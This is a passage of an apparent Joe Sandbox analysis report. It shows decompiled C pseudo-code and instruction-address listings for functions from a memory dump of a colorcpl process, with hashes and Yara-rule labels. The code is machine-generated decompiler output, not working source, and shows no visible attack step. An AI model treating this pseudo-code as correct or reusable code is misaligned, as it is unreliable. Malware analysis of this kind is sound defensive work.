									goto L27;
								}
							}
						}
					} else {
						_t279 = 0xc0000079;
						L83:
						goto L84;
					}
				} else {
					_t279 = 0xc0000079;
					L84:
					 *_a4 = _v28;
					return _t279;
				}
			}

0x043d84c5
0x043d84c8
0x043d84cb
0x043d84ce
0x043d84d1
0x043d84d4
0x043d84df
0x043d84e4
0x043d84e5
0x043d84ef
0x043d84fb
0x043d84fe
0x043d8500
0x043d8501
0x043d8505
0x043d8507
0x043d850a
0x043d850d
0x043d851d
0x043d850f
0x043d8514
0x043d8516
0x043d8518
0x043d8518
0x043d8520
0x043d8522
0x043d852e
0x043d8531
0x043d8534
0x043d8549
0x043d8536
0x043d853d
0x043d8541
0x043d8544
0x043d8544
0x043d854c
0x043d854f
0x043d8654
0x043d8654
0x043d865f
0x043d8665
0x043d8668
0x043d866a
0x043d8689
0x043d8689
0x043d868b
0x043d868b
0x043d868d
0x043d868f
0x043d868f
0x043d8695
0x043d8695
0x043d8698
0x043d8698
0x00000000
0x043d8698
0x043d866c
0x043d8670
0x043d8672
0x043d8674
0x00000000
0x00000000
0x043d8676
0x043d8679
0x043d867c
0x043d8683
0x043d8685
0x043d8685
0x00000000
0x043d8555
0x043d8555
0x043d8558
0x043d855b
0x043d8573
0x043d8575
0x043d855d
0x043d8564
0x043d8568
0x043d856b
0x043d856e
0x043d856e
0x043d8578
0x043d857a
0x043d8650
0x00000000
0x043d8580
0x043d8580
0x043d8584
0x043d8589
0x043d863b
0x043d8645
0x043d864b
0x043d8632
0x043d8632
0x043d8636
0x043d869b
0x043d869b
0x043d869e
0x043d86a1
0x043d86a4
0x043d8779
0x043d877c
0x043d877c
0x043d8782
0x043d8782
0x043d8785
0x043d8796
0x043d8799
0x043d879c
0x043d879e
0x043d87b0
0x043d87b0
0x043d87a0
0x043d87ab
0x043d87ab
0x043d87b2
0x043d87b5
0x043d87b7
0x043d87c5
0x043d87c5
0x043d87b9
0x043d87c0
0x043d87c0
0x043d87c7
0x043d87ca
0x043d87cc
0x043d87da
0x043d87da
0x043d87ce
0x043d87d5
0x043d87d5
0x043d87dc
0x043d87ff
0x043d8801
0x043d8804
0x043d8806
0x043d8812
0x043d881a
0x043d8822
0x043d8826
0x043d8829
0x043d882b
0x043d8847
0x043d882d
0x043d8834
0x043d8839
0x043d883c
0x043d883f
0x043d8842
0x043d8844
0x043d8844
0x043d8849
0x043d884c
0x043d8850
0x043d8853
0x043d8855
0x043d8871
0x043d8871
0x043d8857
0x043d885e
0x043d8863
0x043d8868
0x043d886b
0x043d886d
0x043d886d
0x043d8873
0x043d8887
0x043d888c
0x043d8891
0x043d8896
0x043d889c
0x043d889f
0x043d88a1
0x043d88b1
0x043d88b9
0x043d88b9
0x043d88bb
0x043d88bb
0x043d88be
0x043d88be
0x043d8808
0x043d8808
0x043d8808
0x043d88c0
0x043d88c4
0x043d88c7
0x043d88cf
0x043d88cf
0x043d88d9
0x043d88d9
0x043d88dd
0x043d88e5
0x043d88e5
0x00000000
0x043d88dd
0x043d86aa
0x043d86ad
0x043d86af
0x043d86b2
0x043d86b9
0x043d86bb
0x043d86bb
0x043d86bd
0x043d86bd
0x043d86c0
0x043d86c2
0x00000000
0x043d86c8
0x043d86c8
0x043d86ce
0x043d8768
0x043d876e
0x043d8771
0x00000000
0x043d8771
0x043d86d4
0x043d86d6
0x00000000
0x00000000
0x043d86dc
0x043d86df
0x043d86e2
0x043d86e9
0x043d86eb
0x043d86ed
0x043d86ed
0x043d86f0
0x043d86f3
0x043d86f6
0x043d86fd
0x043d86ff
0x043d8704
0x043d8707
0x043d870e
0x043d8710
0x043d8710
0x043d8707
0x043d8712
0x043d8715
0x043d8719
0x043d871b
0x043d871d
0x043d8723
0x043d8726
0x043d8729
0x043d8730
0x043d8732
0x043d8732
0x043d871f
0x043d871f
0x043d871f
0x043d874c
0x043d874e
0x043d8750
0x043d88d6
0x00000000
0x043d8756
0x043d875f
0x043d8763
0x00000000
0x043d8763
0x043d8750
0x043d86c2
0x043d858f
0x043d8593
0x00000000
0x00000000
0x043d8599
0x043d859c
0x043d85a3
0x043d85a5
0x043d85a7
0x043d85aa
0x043d85b1
0x043d85b3
0x043d85b5
0x043d85b8
0x043d85bf
0x043d85c1
0x043d85c1
0x043d85b8
0x043d85aa
0x043d85c6
0x043d85cc
0x043d85cf
0x043d85d2
0x043d85d4
0x043d85da
0x043d85df
0x043d85e2
0x043d85eb
0x043d85ed
0x043d85ed
0x043d85d6
0x043d85d6
0x043d85d6
0x043d860b
0x043d860d
0x043d860f
0x00000000
0x043d8615
0x043d8615
0x043d861d
0x043d862d
0x043d862d
0x043d862f
0x00000000
0x043d862f
0x043d860f
0x043d857a
0x043d8524
0x043d8524
0x043d88ea
0x00000000
0x043d88ea
0x043d84f1
0x043d84f1
0x043d88eb
0x043d88f1
0x043d88f8
0x043d88f8

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7514924998568e27bd699912f7d3fb2381b959c03acfaf113e3c2b8e0e726c7a
Instruction ID: 841f898b897c5bd03277a0a27b7ad87955a8a1407c15522d2662ecbc0ec2e445
Opcode Fuzzy Hash: 7514924998568e27bd699912f7d3fb2381b959c03acfaf113e3c2b8e0e726c7a
Instruction Fuzzy Hash: 4FD1F072E006098FDF19DF69D841BFEB7F6AF88314F198169D825A7240EB35F9058B60

Uniqueness

Uniqueness Score: -1.00%

Function 043464F0 Relevance: .4, Instructions: 383
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E043464F0(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				intOrPtr _v72;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				char _t170;
				signed short _t178;
				signed int _t183;
				signed int _t191;
				signed int _t197;
				signed int _t198;
				signed int _t202;
				signed int _t206;
				signed int _t209;
				intOrPtr _t211;
				signed int _t231;
				intOrPtr _t232;
				signed int _t241;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t252;
				signed int _t259;
				signed int _t260;
				signed int _t262;
				signed int* _t265;
				intOrPtr _t267;
				signed int _t270;
				signed int _t276;
				signed int* _t278;
				signed int* _t281;
				signed int _t282;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr _t289;
				intOrPtr* _t290;
				void* _t292;
				signed int _t293;
				intOrPtr _t297;
				signed int _t300;
				void* _t302;
				intOrPtr _t303;
				signed int _t311;
				signed int _t317;
				void* _t319;

				_t319 = (_t317 & 0xfffffff8) - 0x3c;
				_t241 = 0;
				_v61 = 0;
				_t167 = __ecx + 0xb4;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v56 = 0;
				_v60 = 0;
				_v24 = _t167;
				if(__edx == _t167) {
					_t168 =  *_t167;
					_v61 = _t168 != 0;
					_v60 = _t168 == 0;
					goto L7;
				} else {
					 *_t167 = 0;
					_t183 =  &_v12;
					_v8 = _t183;
					_v12 = _t183;
					_t259 = _a8 * 8 - _a8;
					_t185 = __edx + _t259 * 4;
					_t260 = _a4;
					_t17 = _t185 + 4; // 0x14
					_v28 = __edx + _t259 * 4;
					_t300 = _t260;
					 *_t17 =  *_t17 - 1 + _t260;
					_t311 = (_t260 << 4) + __edx;
					_t262 = __edx + 0x10 + (_t260 * 8 - _t260) * 4;
					do {
						_t191 =  *(_t311 - 0x10);
						_t311 = _t311 - 0x10;
						_t262 = _t262 - 0x1c;
						_v32 = _t191;
						_t300 = _t300 - 1;
						_v44 = _t262;
						if(_t191 != 0) {
							if(_v61 != 0) {
								_v36 = _t191 + 0x14;
								E04388C00(_t262 - 0x10, _t311, 0x10);
								_t319 = _t319 + 0xc;
								 *((intOrPtr*)(_v44 + 8)) = _v28;
								L04352330(_v44, _v36);
								_t265 = _v36 + 0x18;
								_v20 = _t265;
								_t286 = _t265[1];
								_t197 =  *_t265;
								_v24 = _t197;
								if( *_t286 != _t265) {
									L59:
									asm("int 0x29");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t267 = _v72;
									_t198 = _t197 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if(_t198 == 0) {
										 *0x44391e0(_t267, _t311);
										return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 4))))))();
									}
									return _t198;
								} else {
									_t202 = _v44;
									 *_t202 = _t265;
									 *(_t202 + 4) = _t286;
									 *_t286 = _t202;
									_t265[1] = _t202;
									E043524D0(_v36);
									_v52 = _v52 + 1;
									if(_v24 != _v20) {
										goto L24;
									} else {
										_t281 = _v8;
										_t197 = _v32 + 0xc;
										_t250 = _v56;
										if( *_t281 !=  &_v12) {
											goto L59;
										} else {
											 *(_t197 + 4) = _t281;
											 *_t197 =  &_v12;
											_t241 = _t250 + 1;
											 *_t281 = _t197;
											_v8 = _t197;
											_v56 = _t241;
											goto L23;
										}
									}
								}
							} else {
								_t282 = _v24;
								_v61 = 1;
								 *_t282 = _t191;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t311 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t311 + 8));
								 *((intOrPtr*)(_t282 + 0xc)) =  *((intOrPtr*)(_t311 + 0xc));
								L23:
								_t289 = _v48;
								L24:
								_t262 = _v44;
								goto L4;
							}
						} else {
							_t289 = _v48;
							_v60 = 1;
							goto L4;
						}
						goto L72;
						L4:
					} while (_t300 != 0);
					_t206 = _a4 - 1;
					if(_t289 != _t206) {
						_t290 = _v28;
						asm("lock xadd [ecx], eax");
						if((_t206 | 0xffffffff) == 0) {
							_t232 =  *0x4436644; // 0x0
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t232 + 0x300000,  *_t290);
						}
					}
					if(_t241 != 0) {
						_t209 =  &_v12 - 0xc;
						_t302 = _v12 + 0xfffffff4;
						_t270 = 0xfffffffe;
						_v16 = _t209;
						_t311 = 0;
						_v44 = 0xfffffffe;
						if(_t302 != _t209) {
							_t248 = 0;
							do {
								_t231 = E04386600(1,  *(_t302 + 4), 0);
								_t270 = _v44;
								_t311 = _t311 | _t231;
								if(_t270 != 0xffffffff) {
									if(_t270 != 0xfffffffe) {
										if(_t270 ==  *(_t302 + 4)) {
											goto L41;
										} else {
											_t270 = _t270 | 0xffffffff;
											goto L40;
										}
										while(1) {
											L48:
											_t197 = _v12;
											if(_t197 ==  &_v12) {
												break;
											}
											_t292 =  *_t197;
											if( *(_t292 + 4) != _t197) {
												goto L59;
											} else {
												_t276 =  *(_t197 + 4);
												if( *_t276 != _t197) {
													goto L59;
												} else {
													 *_t276 = _t292;
													 *(_t292 + 4) = _t276;
													_t293 = _t197;
													_t197 =  *((intOrPtr*)(_t303 + 0x14)) + ( *(_t197 - 8) +  *(_t197 - 8) * 2) * 4;
													_t278 =  *(_t197 + 4);
													if( *_t278 != _t197) {
														goto L59;
													} else {
														 *_t293 = _t197;
														 *(_t293 + 4) = _t278;
														 *_t278 = _t293;
														 *(_t197 + 4) = _t293;
														continue;
													}
												}
											}
											goto L72;
										}
										if(_v52 != 0) {
											_t245 = _v52;
											do {
												asm("bsr esi, ebx");
												E043524D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
												asm("btr ebx, esi");
											} while (_t245 != 0);
											_t241 = _v56;
											_t311 = _v40;
										}
										if(_t311 != 0) {
											_t246 = _v40;
											do {
												asm("bsr esi, ebx");
												E043524D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
												asm("btr ebx, esi");
											} while (_t246 != 0);
											_t241 = _v56;
										}
										goto L7;
									} else {
										_t270 =  *(_t302 + 4);
										L40:
										_v44 = _t270;
									}
								}
								L41:
								_t302 =  *((intOrPtr*)(_t302 + 0xc)) - 0xc;
							} while (_t302 != _v16);
							_v52 = _t248;
							_t241 = _v56;
							_v40 = _t311;
						}
						_t303 = _a12;
						E0433BD3D(_t303, _t270);
						_t211 = _v52;
						_v16 = _t311;
						if(_t311 != 0) {
							_t247 = _t311;
							do {
								asm("bsf esi, ebx");
								L04352330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
								asm("btr ebx, esi");
							} while (_t247 != 0);
							_t241 = _v56;
							_t311 = _v40;
							_t211 = _v52;
						}
						if(_t211 != 0) {
							_t244 = _v52;
							do {
								asm("bsf esi, ebx");
								L04352330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
								asm("btr ebx, esi");
							} while (_t244 != 0);
							_t241 = _v56;
							_t311 = _v40;
						}
						goto L48;
					} else {
						L7:
						_t169 = _a12;
						_t252 =  *(_t169 + 8);
						_t284 =  *((intOrPtr*)(_t169 + 0xc));
						do {
							_t170 =  *((intOrPtr*)(_t169 + 0xe4));
							_t297 = _t284;
							_v32 = _t252;
							_v58 = 0;
							_v59 = 0;
							_v57 = _t170;
							_t285 = _t297 + _t241;
							_v28 = _t285;
							if(_t170 == 0) {
								_t178 = (_t252 - 0x00000001 ^ _t252) & 0x0000ffff ^ _t252;
								_t252 = _t178;
								if(_v60 != 0) {
									_t252 = (_t252 >> 0x00000010) - 0x00000001 << 0x00000010 | _t178 & 0x0000ffff;
								}
								if(_v61 == 0) {
									if(_t285 == 0) {
										_v58 = 1;
										_t252 = _t252 ^ (_t252 + 0x00000001 ^ _t252) & 0x0000ffff;
									} else {
										_t285 = _t285 - 1;
										_v28 = _t285;
									}
								}
								if(_t241 != 0 || _v60 != _t241) {
									if(_t285 != 0) {
										if((_t252 & 0xffff0000) == 0) {
											_t252 = _t252 + 0x10000;
											_v59 = 1;
										}
									}
								}
							}
							_t284 = _t297;
							asm("lock cmpxchg8b [esi]");
							_t241 = _v56;
							_t252 = _v32;
							_t169 = _a12;
						} while (_t252 != _v32 || _t284 != _t297);
						if(_v59 != 0) {
							_push( *((intOrPtr*)(_t169 + 0x24)));
							E043840A0();
						}
						 *_a16 = _v58;
						return _v57;
					}
				}
				L72:
			}

0x043464f8
0x043464fc
0x043464fe
0x04346503
0x04346509
0x04346511
0x04346519
0x04346521
0x04346525
0x04346529
0x04346531
0x043a0eef
0x043a0ef3
0x043a0efa
0x00000000
0x04346537
0x04346537
0x04346539
0x0434653d
0x04346541
0x0434654f
0x04346551
0x04346554
0x04346557
0x0434655a
0x04346560
0x04346565
0x04346573
0x0434657a
0x04346580
0x04346580
0x04346583
0x04346586
0x04346589
0x0434658d
0x0434658e
0x04346594
0x04346688
0x04346715
0x0434671e
0x04346727
0x04346732
0x04346735
0x0434673e
0x04346741
0x04346745
0x04346748
0x0434674a
0x04346750
0x043468f1
0x043468f6
0x043468f8
0x043468f9
0x043468fa
0x043468fb
0x043468fc
0x043468fd
0x043468fe
0x043468ff
0x04346905
0x04346908
0x0434690b
0x0434690f
0x0434691e
0x00000000
0x04346926
0x04346912
0x04346756
0x04346756
0x0434675e
0x04346760
0x04346763
0x04346765
0x04346768
0x04346776
0x0434677e
0x00000000
0x04346784
0x04346784
0x04346790
0x04346795
0x04346799
0x00000000
0x0434679f
0x043467a3
0x043467a6
0x043467a8
0x043467a9
0x043467ab
0x043467af
0x00000000
0x043467af
0x04346799
0x0434677e
0x0434668e
0x0434668e
0x04346692
0x04346697
0x0434669c
0x043466a2
0x043466a8
0x043466ab
0x043466ab
0x043466af
0x043466af
0x00000000
0x043466af
0x0434659a
0x0434659a
0x0434659e
0x00000000
0x0434659e
0x00000000
0x043465a3
0x043465a3
0x043465aa
0x043465ad
0x043466f7
0x04346701
0x04346705
0x043a0f06
0x043a0f1a
0x043a0f1a
0x04346705
0x043465b5
0x043467c0
0x043467c3
0x043467c6
0x043467cb
0x043467cf
0x043467d1
0x043467d7
0x043467d9
0x043467e0
0x043467ea
0x043467ef
0x043467f3
0x043467fa
0x043467ff
0x043a0f27
0x00000000
0x043a0f2d
0x043a0f2d
0x00000000
0x043a0f2d
0x04346870
0x04346870
0x04346870
0x0434687a
0x00000000
0x00000000
0x0434687c
0x04346881
0x00000000
0x04346883
0x04346883
0x04346888
0x00000000
0x0434688a
0x0434688a
0x0434688c
0x0434688f
0x0434689a
0x0434689d
0x043468a2
0x00000000
0x043468a4
0x043468a4
0x043468a6
0x043468a9
0x043468ab
0x00000000
0x043468ab
0x043468a2
0x04346888
0x00000000
0x04346881
0x043468b5
0x043468e8
0x043a0f64
0x043a0f67
0x043a0f76
0x043a0f7b
0x043a0f7e
0x043a0f82
0x043a0f86
0x043a0f86
0x043468b9
0x043468bf
0x043468c3
0x043468c6
0x043468d3
0x043468d8
0x043468db
0x043468df
0x043468df
0x00000000
0x04346805
0x04346805
0x04346808
0x04346808
0x04346808
0x043467ff
0x0434680c
0x0434680f
0x04346812
0x04346818
0x0434681c
0x04346820
0x04346820
0x04346824
0x0434682b
0x04346830
0x04346834
0x0434683a
0x0434683c
0x04346840
0x04346843
0x04346850
0x04346855
0x04346858
0x0434685c
0x04346860
0x04346864
0x04346864
0x0434686a
0x043a0f35
0x043a0f39
0x043a0f3c
0x043a0f4b
0x043a0f50
0x043a0f53
0x043a0f57
0x043a0f5b
0x043a0f5b
0x00000000
0x043465bb
0x043465bb
0x043465bb
0x043465be
0x043465c4
0x043465d0
0x043465d0
0x043465d6
0x043465d8
0x043465dc
0x043465e1
0x043465e6
0x043465ea
0x043465ed
0x043465f3
0x043465fd
0x04346604
0x04346606
0x04346612
0x04346612
0x04346619
0x0434661d
0x043466bb
0x043466c5
0x04346623
0x04346623
0x04346624
0x04346624
0x0434661d
0x0434662a
0x04346634
0x043466d2
0x043466d8
0x043466de
0x043466de
0x043466d2
0x04346634
0x0434662a
0x0434663e
0x04346647
0x0434664b
0x0434664f
0x04346651
0x04346654
0x0434666b
0x043466ea
0x043466ed
0x043466ed
0x04346676
0x04346680
0x04346680
0x043465b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65b197b5252a1931260862d00f769e362b5f3503afadcf02a5c00c306775244
Instruction ID: d5ca6858303c1331406c16c68bb0b895dc8d8f7ac2fdecbd99a405e403d63aa4
Opcode Fuzzy Hash: c65b197b5252a1931260862d00f769e362b5f3503afadcf02a5c00c306775244
Instruction Fuzzy Hash: C3E18C706083418FD714CF28C490AAABBE4FFCA318F15996DE89997351EB35F905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0434D700 Relevance: .3, Instructions: 342
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0434D700(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* __ebp;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed char _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				intOrPtr _t145;
				signed char _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char _t151;
				signed int _t154;
				signed int* _t160;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				signed char _t179;
				intOrPtr _t180;
				signed int _t182;
				signed int _t191;
				signed int _t192;
				signed int _t198;
				signed int* _t201;
				signed int _t203;
				void* _t206;
				signed int _t208;
				signed int _t213;
				void* _t218;

				_t190 = __edx;
				_v8 =  *((intOrPtr*)(_t218 + 4));
				_t201 = __edx;
				_v32 = 0;
				_t208 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((intOrPtr*)(__edx + 8)) = 0;
				if( *0x44365f4 != 3) {
					L14:
					_push(0);
					_push(0xc);
					_push( &_v60);
					_push(6);
					_push(_t208);
					_push(0xffffffff);
					_t114 = E04382BE0();
					__eflags = _t114;
					if(_t114 < 0) {
						L69:
						_t168 = 0;
						_v24 = 0;
						L19:
						_t201[1] = _t168;
						__eflags = _t168;
						if(_t168 == 0) {
							_t191 = _v32;
							L41:
							_t115 = _t191;
							L13:
							return _t115;
						}
						_v28 = 0;
						E0434E580(1, _t168, 0, 0,  &_v28);
						_t118 = _v28;
						__eflags =  *(_t118 + 0x5e) & 0x00000400;
						if(( *(_t118 + 0x5e) & 0x00000400) != 0) {
							L48:
							_t192 = _t190 | 0xffffffff;
							_t115 = _t192;
							_t201[3] = _t208 | _t192;
							 *_t201 = _t192;
							goto L13;
						}
						E0434E580(1, _v24, 0, 0,  &_v48);
						_t121 = _v24;
						_t208 = 0;
						_v13 = 1;
						_t171 = _t121;
						_v20 = _t171;
						_v36 = 0;
						_v40 = 0;
						__eflags = _t121 & 0x00000003;
						if((_t121 & 0x00000003) != 0) {
							_t171 = _t171 & 0xfffffffc;
							_t142 =  !_t121 & 0x00000001;
							__eflags = _t142;
							_v20 = _t171;
							_v13 = _t142;
						}
						_t123 = E0434E580(1, _t171, 0, 0,  &_v36);
						_t172 = _v36;
						__eflags = _t172;
						if(_t172 == 0) {
							L77:
							__eflags = _t123;
							if(__eflags < 0) {
								goto L72;
							}
							goto L78;
						} else {
							_t136 =  *(_t172 + 0x18) & 0x0000ffff;
							_t190 = 0x10b;
							__eflags = _t136 - 0x10b;
							if(_t136 != 0x10b) {
								_t190 = 0x20b;
								__eflags = _t136 - 0x20b;
								if(__eflags != 0) {
									L72:
									_t125 = E0434DE20(_v24, __eflags, _v24, 1, 0xe,  &_v20);
									__eflags = _t125;
									if(_t125 == 0) {
										L74:
										_t191 = 0;
										L40:
										_t201[3] = 0;
										 *_t201 = _t191;
										goto L41;
									}
									__eflags =  *(_t125 + 0x10) & 0x00000001;
									if(( *(_t125 + 0x10) & 0x00000001) != 0) {
										goto L48;
									}
									goto L74;
								}
								_t190 = _v13;
								_t123 = E04337386(_v20, _t190, 0xa,  &_v44, _t172,  &_v40);
								_t208 = _v40;
								goto L77;
							}
							__eflags =  *((intOrPtr*)(_t172 + 0x74)) - 0xa;
							if(__eflags <= 0) {
								goto L72;
							}
							_t208 =  *(_t172 + 0xc8);
							__eflags = _t208;
							if(__eflags == 0) {
								goto L72;
							}
							__eflags = _v13;
							_t190 =  *(_t172 + 0xcc);
							_v44 = _t190;
							if(_v13 == 0) {
								__eflags = _t208 -  *((intOrPtr*)(_t172 + 0x54));
								if(_t208 <  *((intOrPtr*)(_t172 + 0x54))) {
									goto L28;
								}
								_t208 = E04349630(_t172, _v20, _t208);
								__eflags = _t208;
								if(__eflags != 0) {
									L78:
									_t190 = _v44;
									L29:
									__eflags = _t208;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190;
									if(__eflags == 0) {
										goto L72;
									}
									__eflags = _t190 - 0x40;
									if(_t190 == 0x40) {
										L33:
										_t127 =  *(_v48 + 4) & 0x0000ffff;
										__eflags = _t127 - 0x3a64;
										if(_t127 == 0x3a64) {
											L35:
											__eflags =  *_t208 - 0x48;
											if(__eflags < 0) {
												goto L72;
											}
											_t190 =  *(_t208 + 0x40);
											__eflags = _t190;
											if(__eflags == 0) {
												goto L72;
											}
											_t208 =  *(_t208 + 0x44);
											__eflags = _t208;
											if(__eflags == 0) {
												goto L72;
											}
											_t128 = _v28;
											_t175 = _v24;
											__eflags = _t190 -  *((intOrPtr*)(_t128 + 0x54)) + _t175;
											if(_t190 <  *((intOrPtr*)(_t128 + 0x54)) + _t175) {
												goto L48;
											}
											_t131 = _v28;
											__eflags = _t208 -  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2;
											if(_t208 >  *((intOrPtr*)(_t131 + 0x50)) - _t190 + _t175 >> 2) {
												goto L48;
											}
											goto L40;
										}
										__eflags = _t127 - 0x14c;
										if(__eflags != 0) {
											goto L72;
										}
										goto L35;
									}
									__eflags = _t190 -  *_t208;
									if(__eflags != 0) {
										goto L72;
									}
									goto L33;
								}
								goto L72;
							}
							L28:
							_t208 = _t208 + _v20;
							__eflags = _t208;
							goto L29;
						}
					}
					_t168 = _v60;
					_v24 = _t168;
					__eflags = _t168;
					if(_t168 == 0) {
						goto L69;
					}
					__eflags = _v52 & 0x00000003;
					if((_v52 & 0x00000003) != 0) {
						goto L69;
					}
					__eflags = _t208 - _t168;
					if(_t208 < _t168) {
						goto L69;
					}
					_t201[2] = _v56;
					goto L19;
				}
				L043453C0(0x443681c);
				_t145 =  *0x4439360; // 0x1d
				if(_t145 == 1) {
					L11:
					_t190 = 0x443681c;
					_t146 = 0x11;
					asm("lock cmpxchg [edx], ecx");
					_t179 = 0x11;
					if(0x11 != 0x11) {
						__eflags = 1;
						if(1 == 0) {
							_t146 = L04398AA0(0x11, 0x443681c, 0xc0000264);
							L55:
							__eflags = _t179 & 0x00000008;
							if((_t179 & 0x00000008) == 0) {
								_t147 = _t146 | 0xffffffff;
								__eflags = _t147;
								_v28 = _t147;
								L61:
								_t203 = _v28;
								while(1) {
									_t149 = _t179 & 0x00000006;
									_v40 = _t149;
									__eflags = _t149 - 2;
									_t150 = _t203 + 4;
									if(_t149 != 2) {
										_t150 = _t203;
									}
									_t190 = _t179 + _t150;
									_t151 = _t179;
									asm("lock cmpxchg [edi], esi");
									_t203 = _v28;
									__eflags = _t151 - _t179;
									if(_t151 == _t179) {
										break;
									}
									_t179 = _t151;
								}
								__eflags = _v40 - 2;
								_t201 = _v20;
								if(_v40 == 2) {
									_t190 = 0;
									__eflags = 0;
									E04373BDB(0x443681c, 0, 0);
								}
								_t208 = _v24;
								goto L12;
							}
							_t154 = _t179 & 0xfffffff0;
							_t190 =  *(_t154 + 4);
							__eflags = _t190;
							if(_t190 != 0) {
								L58:
								asm("lock xadd [edx+0x10], eax");
								__eflags = (_t154 | 0xffffffff) - 1;
								if((_t154 | 0xffffffff) - 1 > 0) {
									goto L12;
								}
								_v28 = 0xfffffff7;
								goto L61;
							} else {
								goto L57;
							}
							do {
								L57:
								_t154 =  *_t154;
								_t190 =  *(_t154 + 4);
								__eflags = _t190;
							} while (_t190 == 0);
							goto L58;
						}
						__eflags = 0;
						if(0 != 0) {
							goto L55;
						}
						while(1) {
							_t75 = _t179 - 0x10; // 0x1
							asm("sbb edx, edx");
							_t190 =  ~((_t179 & 0xfffffff0) - 0x10) & _t75;
							_t146 = _t179;
							asm("lock cmpxchg [edi], edx");
							_t201 = _v20;
							__eflags = _t146 - _t179;
							if(_t146 == _t179) {
								goto L12;
							}
							_t179 = _t146;
							__eflags = _t146 & 0x00000002;
							if((_t146 & 0x00000002) == 0) {
								continue;
							}
							goto L55;
						}
					}
					L12:
					_t115 = _v32;
					if(_t115 == 0) {
						__eflags =  *0x443936c;
						if( *0x443936c != 0) {
							goto L14;
						}
						_t180 =  *[fs:0x30];
						__eflags =  *(_t180 + 0x28) & 0x00000080;
						if(( *(_t180 + 0x28) & 0x00000080) == 0) {
							goto L13;
						}
						goto L14;
					}
					goto L13;
				}
				_t182 = 1;
				_t8 = _t145 - 1; // 0x1c
				_t206 = _t8;
				if(_t206 < 1) {
					L53:
					_t201 = _v20;
					goto L11;
				} else {
					goto L3;
				}
				do {
					L3:
					_t198 = _t182 + _t206 >> 1;
					_t160 = (_t198 << 4) + 0x4439370;
					_t213 = _t160[1];
					if(_v24 < _t213) {
						_t208 = _v24;
						__eflags = _t198;
						if(_t198 == 0) {
							goto L53;
						}
						_t206 = _t198 - 1;
						goto L6;
					}
					_t208 = _v24;
					if(_t208 < _t160[2] + _t213) {
						_t201 = _v20;
						 *_t201 =  *_t160;
						_t201[1] = _t160[1];
						_t201[2] = _t160[2];
						_t201[3] = _t160[3];
						asm("ror eax, cl");
						_t165 =  *_t201 ^  *0x7ffe0330;
						__eflags = _t165;
						_v32 = _t165;
						 *_t201 = _t165;
						goto L11;
					}
					_t182 = _t198 + 1;
					L6:
				} while (_t206 >= _t182);
				goto L53;
			}

0x0434d700
0x0434d712
0x0434d724
0x0434d726
0x0434d72d
0x0434d72f
0x0434d732
0x0434d735
0x0434d73c
0x0434d743
0x0434d815
0x0434d815
0x0434d817
0x0434d81c
0x0434d81d
0x0434d81f
0x0434d820
0x0434d822
0x0434d827
0x0434d829
0x043a3f8a
0x043a3f8a
0x043a3f8c
0x0434d855
0x0434d855
0x0434d858
